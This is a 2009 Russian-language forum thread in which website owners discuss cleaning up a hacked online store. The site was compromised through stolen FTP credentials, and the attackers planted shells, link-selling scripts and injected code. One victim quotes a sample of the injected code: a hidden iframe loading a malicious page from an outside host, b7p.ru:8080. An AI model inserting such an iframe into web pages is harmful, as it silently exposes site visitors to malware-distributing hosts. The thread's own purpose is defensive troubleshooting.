Как убрать чужой код

Fars · 7 Июл 2009

Украли пароль от фтп и залили сапу на сайт - инет-магаз в Shop script premium. Комп почистил, были троянцы. На сервере чищу руками - убрал шеллы, и файлы сапы, но опять заливают посторонние файлы. Пароли менял, комп проверил весь - наверное, остались коды посторонние в скрипте.

Как почистить скрипт? Только переставлять?

xXrum · 7 Июл 2009

права на папку куда заливают не пробовал менять? Как я знаю для сапы права 777 и туда сапа сама заливает свои файлы при индексации

NhGXkv85PR · 7 Июл 2009

проще всего восстановить из резервной копии все - той что до взлома сделана была (ну если была конечно сделана) И быстро и думать не надо.

Fars · 7 Июл 2009

Ссылки-то ладно, понятно, как заливают - вопрос в том, как найти код, который эти ссылки мне в страницы вставляет.
Взломали давно, резерва чистого целикового нет.. Походу придется заново ставить.

dimvin · 12 Июл 2009

просто перезалить из исходника не поможет - опять сломают. Если заливали сапу - то быстро обнаружат, что перестал работать их код и придут снова. Это эпидемия сейчас. Нужно латать дыры - и бэкапить код, базу и изображения товаров.

Дмитрий Кесаев · 13 Июл 2009

Обращайся к Фоминсе (fominsa), он поможет!

SSSonar · 29 Июл 2009

У меня такой же трабл.

1.Как меняю. В командере ставлю сортировку по дате и смотрю последние изменённые, естестно только их с локалки и перезаписываю на сервер.
2. После того как поработал с магазом на сервере, меняю пароль на FTP.
3. Теперь делаю проще. Захожу в ini файл командера и тупо удаляю логи (зашифрованные пароли только, естестно).
4. Чищу системные папки винды антивирем. Как спастись от трояна не знаю. Фаервол его не палит, каким образом попадает в комп, тоже не известно. Но раз в неделю после чистки прописывает зловредный код на серваке, тыря пароль с командера на ftp. Поентому вижу только 2 варианта. Менять пароль ftp сразу после его посещения. Либо чистить логи командера...

Atec · 29 Июл 2009

Для просмотра скрытого содержимого вы должны войти или зарегистрироваться.

VLDM · 29 Июл 2009

А если на хостинге сделать простой сканер своих файлов и поставить его в cron как только обнаруживается чужой файл его автоматом удалять.

SSSonar · 30 Июл 2009

Atec написал(а):
*** скрытое содержание ***

с командером давно работаю... Удобней проги для работы с файловой системы не знаю. А что касается FTP, так тоже не вижу проблем - залить, слить...Дерево каталогов прекрасно видно...в принципе больше ничего не надо...

Добавлено через 5 минут

VLDM написал(а):
А если на хостинге сделать простой сканер своих файлов и поставить его в cron как только обнаруживается чужой файл его автоматом удалять.

а чужие файлы и не записываются...Троянец прописывает в моих файлах(во всех home.*, index.*) зловредный код, ведущий на другие сайты с троянцами.

один из примеров кода:
<body><iframe src="http://b7p.ru:8080/index.php" width=114 height=111 style="visibility: hidden"></iframe>

Как убрать чужой код

Fars

Мастер

xXrum

Писатель

NhGXkv85PR

Знаток

Fars

Мастер

dimvin

Писатель

Дмитрий Кесаев

aka Zlobniy Babko

SSSonar

Создатель

Atec

Мастер

VLDM

Постоялец

SSSonar

Создатель